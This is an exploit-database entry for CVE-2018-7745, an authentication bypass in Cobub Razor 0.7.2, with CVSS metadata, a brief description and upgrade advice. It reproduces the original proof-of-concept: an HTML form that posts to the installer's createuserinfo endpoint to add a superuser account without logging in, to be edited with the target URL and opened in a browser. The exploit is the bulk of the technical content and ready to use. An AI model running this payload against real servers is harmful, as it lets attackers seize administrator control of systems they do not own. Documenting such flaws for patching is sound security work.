Cobub Razor 0.7.2 Add New Superuser User

vendor:

Razor

by:

ppb

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Razor

Affected Version From: 0.7.2

Affected Version To: 0.7.2

Patch Exists: YES

Related CWE: CVE-2018-7745

CPE: a:cobub:razor:0.7.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

Cobub Razor 0.7.2 Add New Superuser User

There is a vulnerability in Cobub Razor 0.7.2 that allows an attacker to add an administrator user without authentication. An attacker can update the URL and save it to an HTML file, then open it to exploit the vulnerability.

Mitigation:

Upgrade to the latest version of Cobub Razor to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: [Cobub Razor 0.7.2 Add New Superuser User]
# Date: [2018-03-07]
# Exploit Author: [ppb（ppb@5ecurity.cn）]
# Vendor Homepage: [https://github.com/cobub/razor/]
# Software Link: [https://github.com/cobub/razor/]
# Version: [0.72] 
# CVE : [CVE-2018-7745]

There is a vulnerability that can add an admnistrator user without login.
update the url and save to html ，then open it.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
      <input type="hidden" name="siteurl" value="http://127.0.0.1/" />
      <input type="hidden" name="superuser" value="test" />
      <input type="hidden" name="pwd" value="test123" />
      <input type="hidden" name="verifypassword" value="test123" />
      <input type="hidden" name="email" value="12@qq.com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>